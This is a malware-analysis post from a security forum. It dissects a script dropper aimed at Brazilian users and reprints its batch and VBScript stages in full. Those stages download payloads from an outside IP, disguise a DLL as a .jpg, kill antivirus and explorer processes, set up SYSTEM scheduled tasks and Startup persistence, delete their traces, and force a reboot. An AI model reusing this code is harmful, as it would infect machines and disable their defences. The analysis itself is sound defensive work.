IF %PROCESSOR_ARCHITECTURE% == x86 (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/3/32/%RANDOM%/%RANDOM%/DY9e/FMgj/In7t9.Kaf %LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg
) ELSE (
%1 /AddFile NZrk3biH7Y http://200.98.168.174/3/64/%RANDOM%/%RANDOM%/THCo6/%RANDOM%/Y7DD/%RANDOM%/dFFSx0/ghi8iuh.iWy %LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg
)
%1.exe /SetNotifyCmdLine NZrk3biH7Y "%comspec%" "cmd /c cscript.exe C:\Users\DardiM\AppData\Local\Temps\ngx2uq.vbs"
%1 /Resume NZrk3biH7Y
Erase "%0"
v5KT1ENIDUVo.bat :

- Completes the job initialized by UQv5OyjGx1f.bat

- Try to kill 'AvastSvc.exe' with nogui ProcessHacker.exe (nogui : hide GUI)

- Extracts all the useful files to %windir%

- InfDefaultInstall.exe %WINDIR%\setup.inf

- use echo with > and >> : redirections
- example :

echo On Error Resume Next> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"

=> create the file and write On Error Resume Next

echo set xTsNBe0z1 = WScript.CreateObject("WScript.Shell")>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"

=> appends (add) WScript.CreateObject("WScript.Shell") to m7hSw7Y2f.vbs


There are also a lot of parts to add useless comment on m7hSw7Y2f.vbs, like :

R9cs39N4.WriteLine("echo 'Vyy6PGpxSIZ1iNJX3ybzmkfbwZf17Sn7avNwq5aN36sqU8gF7ptVKLAaN0x1rs9s4Pe27prtIEQ1iNWZMe7rJN6o9ua01b3z2qRch8C4v6XOcP88lqV0SMRK26trbSo4eEsk6Tgn5DFShUw5xkIWjQwMt4qVwdvT3zLI3Hhi6MR9AWYdOxlTcVkSbU4XUUm0GyrwfRyboO1ig578DA >> %LOCALAPPDATA%\\Temps\\m7hSw7Y2f.vbs");
=> allows to obfuscate a bit more
=> it creates m7hSw7Y2f.vbs with some contents- use echo with redirection >> yQoN9p28y.vbs

=> then add its content :

set So309D2GXyWt65iW8WL = WScript.CreateObject("WScript.Shell")
ErAO7tz49 = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\n9y7zrblxW3.lnk"
set QQgIu3CAWkdYJ2X5 = So309D2GXyWt65iW8WL.CreateShortcut(ErAO7tz49)
QQgIu3CAWkdYJ2X5.TargetPath = "C:\Users\fredd\AppData\Local\Temps\m7hSw7Y2f.vbs"
QQgIu3CAWkdYJ2X5.Save

=> when this file is run, create a Shortcut on the Startup Folder, targeting m7hSw7Y2f.vbs
- runs yQoN9p28y.vbs

- deletes all temporary files used :

DEL "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
DEL "C:\Users\fredd\AppData\Local\Temps\ngx2uq.vbs"
DEL "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg"
DEL "%LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip"
DEL "%LOCALAPPDATA%\Temps\kdbJe8gRfp.zip"
DEL "%LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip"
- reboots the PC :

TIMEOUT 180 & Erase "%0" & shutdown -r -f -c "Atualizando Microsoft Windows Install."
-r : Reboots after shutdown.
-f : Forces running applications to close.
-c " message " : Specifies a message to be displayed :

=> "Atualizando Microsoft Windows Install."
(remember it targets Brazilians)​
Look at the spoiler part !
@echo off
bitsadmin /complete NZrk3biH7Y
SCHTASKS /CREATE /F /SC ONSTART /DELAY 0000:01 /TN "{D69166F8-5801-4516-85C9-A9AB6BF664E2}" /TR "%WINDIR%\MSSevices32.exe" /RU SYSTEM
SCHTASKS /CREATE /F /SC ONSTART /DELAY 0000:30 /TN "{26B75C81-B815-4466-9DC5-5C91B370BADA}" /TR "cmd /c tasklist | find /i "'AvastSvc.exe'">null || %WINDIR%\555500.bat nogui ProcessHacker.exe" /RU SYSTEM
TIMEOUT 5
TIMEOUT 5
rundll32 "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg",#2 "%LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip" "%WINDIR%"
rundll32 "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg",#2 "%LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip" "%WINDIR%"
TIMEOUT 5
InfDefaultInstall.exe %WINDIR%\setup.inf
TIMEOUT 5
SCHTASKS /RUN /TN "{D69166F8-5801-4516-85C9-A9AB6BF664E2}"
TIMEOUT 10
rundll32 "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg",#2 "%LOCALAPPDATA%\Temps\kdbJe8gRfp.zip" "%LOCALAPPDATA%\Temps"
TIMEOUT 5
echo On Error Resume Next> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo set xTsNBe0z1 = WScript.CreateObject("WScript.Shell")>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo WScript.Sleep(90000)>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo xTsNBe0z1.Run("rundll32 %LOCALAPPDATA%\Temps\tykeo13w.iqld,#2 VEi8sQm")>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo RAj9WSg = ".">> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set UPOfAz2RnR = GetObject("winmgmts:" ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo "{impersonationLevel=impersonate}!\\" ^& RAj9WSg ^& "\root\cimv2")>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Chr(039)^&Chr(103)^&Chr(098)^&Chr(112)^&Chr(115)^&Chr(118)^&Chr(046)^&Chr(101)^&Chr(120)^&Chr(101)^&Chr(039))>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo For Each gQ0GVRiRzf6e0 in h50KAQ29554T>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo gQ0GVRiRzf6e0.Terminate(1)>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Next>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo ("Select * from Win32_Process Where Name = " ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Chr(039)^&Chr(101)^&Chr(120)^&Chr(112)^&Chr(108)^&Chr(111)^&Chr(114)^&Chr(101)^&Chr(114)^&Chr(046) ^&_>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Chr(101)^&Chr(120)^&Chr(101)^&Chr(039))>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo For Each gQ0GVRiRzf6e0 in h50KAQ29554T>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo gQ0GVRiRzf6e0.Terminate(1)>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Next>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo xTsNBe0z1.Run "explorer.exe">> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Set xTsNBe0z1 = Nothing>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo Wscript.exit>> "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs"
echo set So309D2GXyWt65iW8WL = WScript.CreateObject("WScript.Shell") > "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
echo ErAO7tz49 = "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup\n9y7zrblxW3.lnk" >> "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
echo set QQgIu3CAWkdYJ2X5 = So309D2GXyWt65iW8WL.CreateShortcut(ErAO7tz49) >> "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
echo QQgIu3CAWkdYJ2X5.TargetPath = "%LOCALAPPDATA%\Temps\m7hSw7Y2f.vbs" >> "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
echo QQgIu3CAWkdYJ2X5.Save >> "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
cscript "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
DEL "%LOCALAPPDATA%\Temps\yQoN9p28y.vbs"
DEL "C:\Users\fredd\AppData\Local\Temps\ngx2uq.vbs"
DEL "%LOCALAPPDATA%\Temps\h4zL4J4Nf6.jpg"
DEL "%LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip"
DEL "%LOCALAPPDATA%\Temps\kdbJe8gRfp.zip"
DEL "%LOCALAPPDATA%\Temps\U34B2X0Cwk5dk2lfzCJ.zip"
TIMEOUT 180 & Erase "%0" & shutdown -r -f -c "Atualizando Microsoft Windows Install."
m7hSw7Y2f.vbs :

On Error Resume Next
set xTsNBe0z1 = WScript.CreateObject("WScript.Shell")
WScript.Sleep(90000)
xTsNBe0z1.Run("rundll32 C:\Users\DardiM\AppData\Local\Temps\tykeo13w.iqld,#2 VEi8sQm")

=> run the tykeo13w.iqld (dll), entry point #2 argument VEi8sQm
RAj9WSg = "."
Set UPOfAz2RnR = GetObject("winmgmts:" &_
"{impersonationLevel=impersonate}!\\" & RAj9WSg & "\root\cimv2")
Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _
("Select * from Win32_Process Where Name = " &_ Chr(039)&Chr(103)&Chr(098)&Chr(112)&Chr(115)&Chr(118)&Chr(046)&Chr(101)&Chr(120)&Chr(101)&Chr(039))
=> searches for all occurrence of 'gbpsv.exe'
For Each gQ0GVRiRzf6e0 in h50KAQ29554T
gQ0GVRiRzf6e0.Terminate(1)
=> terminates the process
Next
Set h50KAQ29554T = UPOfAz2RnR.ExecQuery _
("Select * from Win32_Process Where Name = " &_ Chr(039)&Chr(101)&Chr(120)&Chr(112)&Chr(108)&Chr(111)&Chr(114)&Chr(101)&Chr(114)&Chr(046) &_
Chr(101)&Chr(120)&Chr(101)&Chr(039))

=> searches for all occurrence of 'explorer.exe'

For Each gQ0GVRiRzf6e0 in h50KAQ29554T
gQ0GVRiRzf6e0.Terminate(1)
=> terminates the process
Next
xTsNBe0z1.Run "explorer.exe"

Set xTsNBe0z1 = Nothing
Wscript.exit
3) Conclusion :

- Arq-comprov.js is forced to run with elevated permission

- It creates :

- UQv5OyjGx1f.bat
- v5KT1ENIDUVo.bat
- ngx2uq.vbs
- it runs :

- UQv5OyjGx1f.bat

- that download all the files needed
- run ngx2uq.vb
- ngx2uq.vb

- runs v5KT1ENIDUVo.bat
- v5KT1ENIDUVo.bat

- that extracts all the file needed
- creates m7hSw7Y2f.vbs
- creates yQoN9p28y.vbs
- runs yQoN9p28y.vbs

=> creates the shortcut targeting m7hSw7Y2f.vbs in the start folder
- reboots the pc

=> m7hSw7Y2f.vbs is run

=> rundll32 C:\Users\DardiM\AppData\Local\Temps\tykeo13w.iqld,#2 VEi8sQm​
I would like to get the files downloaded (3 .zip files and one .dll as .jpg), and see what is extracted and used, but the links don't work anymore.

Only clues allow me to see :

donwloaded :

kdbJe8gRfp.zip
n2x8Fb8oeJ.zip
U34B2X0Cwk5dk2lfzCJ.zip
h4zL4J4Nf6.jpg

=> h4zL4J4Nf6.jpg used as dll to extract the zip file content in "%WINDIR%"

=> InfDefaultInstall.exe %WINDIR%\setup.inf

After reboot :

m7hSw7Y2f.vbs is run :​

=> it runs too : rundll32 C:\Users\DardiM\AppData\Local\Temps\tykeo13w.iqld,#2 VEi8sQm​

A remark :

http://200.98.168.174/1/32/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/%RANDOM%/nyXRj/r0A850g.uIc %LOCALAPPDATA%\Temps\n2x8Fb8oeJ.zip

in a batch file %RANDOM% is a number from 0 to 32767

=> URLs are not hard coded

See the spoiler parts to see the content of each file used :)
 
Last edited:
  • Like
Reactions: Logethica, Daniel Hidalgo, frogboy and 8 others
You must log in or register to reply here.

Similar threads

J
  • Locked
I need help with a Malware Spanish logs
Replies
2
Views
1,832
Windows Malware Removal Help & Support
nasdaq
nasdaq
Anthony Qian
    • +Reputation
    • Like
    • Thanks
New Update Avira expands its APC to support script malware
Replies
4
Views
1,276
Avira
Anthony Qian
Anthony Qian
Guilhermesene
    • Like
    • Applause
Hot Take [Tutorial] Update Kaspersky when starting the system automatically
Replies
9
Views
733
Kaspersky
Jonny Quest
Jonny Quest

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top